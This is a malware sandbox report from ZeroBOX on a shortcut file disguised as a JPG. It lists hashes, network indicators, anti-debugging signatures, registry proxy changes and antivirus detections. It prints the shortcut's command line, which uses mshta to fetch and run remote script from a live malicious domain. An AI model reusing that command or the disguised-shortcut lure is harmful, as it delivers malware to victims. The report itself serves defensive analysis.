popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

ADGMP-EC-AGB-June21.jpg.lnk

AntiVM AntiDebug GIF Format
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 Aug. 5, 2021, 10:54 a.m. Aug. 5, 2021, 10:57 a.m.
Size 1.4KB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has command line arguments, Icon number=325, Archive, ctime=Sat Dec 7 00:09:39 2019, mtime=Fri Jun 18 23:00:04 2021, atime=Sat Dec 7 00:09:39 2019, length=14848, window=hide
MD5 6ef8991c1fef9c553e7cc9b2ba4517bd
SHA256 61df8bc3aed05ea399d31063e27b10f7cb0e05ae76090ff3befb6cfd255adf07
CRC32 B27C5896
ssdeep 24:8BR/jbhb8AUP6A+3Viwcrxcx4I0WYctXQaR3+PUGgctCGO+/efmv0:8BlxUCA43OI/Xv3ZbmvO5U
Yara
  • Lnk_Format_Zero - LNK Format

Name Response Post-Analysis Lookup
bsnlplots.com
A 172.67.221.235
A 104.21.54.4
172.67.221.235
IP Address Status Action
104.21.54.4 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49165 -> 104.21.54.4:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49165
104.21.54.4:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com fd:49:9b:03:bf:ec:8d:81:dc:c1:61:c4:9e:5f:3d:c1:19:e9:29:1f

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET https://bsnlplots.com/css/css/b/l/i2.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2180
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d82000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2180
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x737b3000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\ADGMP-EC-AGB-June21.jpg.lnk
cmdline "C:\Windows\System32\mshta.exe" https://bsnlplots.com/css/css/b/l/i2.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2180
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x000002e0
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
FireEye Heur.BZC.YAX.Nioc.1.0593947D
BitDefender Heur.BZC.YAX.Nioc.1.0593947D
MicroWorld-eScan Heur.BZC.YAX.Nioc.1.0593947D
Ad-Aware Heur.BZC.YAX.Nioc.1.0593947D
Emsisoft Heur.BZC.YAX.Nioc.1.0593947D (B)
Sophos Troj/DownLnk-X
MAX malware (ai score=87)
Microsoft Trojan:Script/Wacatac.B!ml
GData Heur.BZC.YAX.Nioc.1.0593947D
ALYac Heur.BZC.YAX.Nioc.1.0593947D
Zoner Probably Heur.LNKScript
Qihoo-360 ex_virus.lnk.lnkcmd.c
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x000002e0
regkey_r: ProxyOverride
reg_type: 1 (REG_SZ)
value: 127.0.0.1:16107;
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
1 0 0
Process injection Process 760 resumed a thread in remote process 2180
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000330
suspend_count: 1
process_identifier: 2180
1 0 0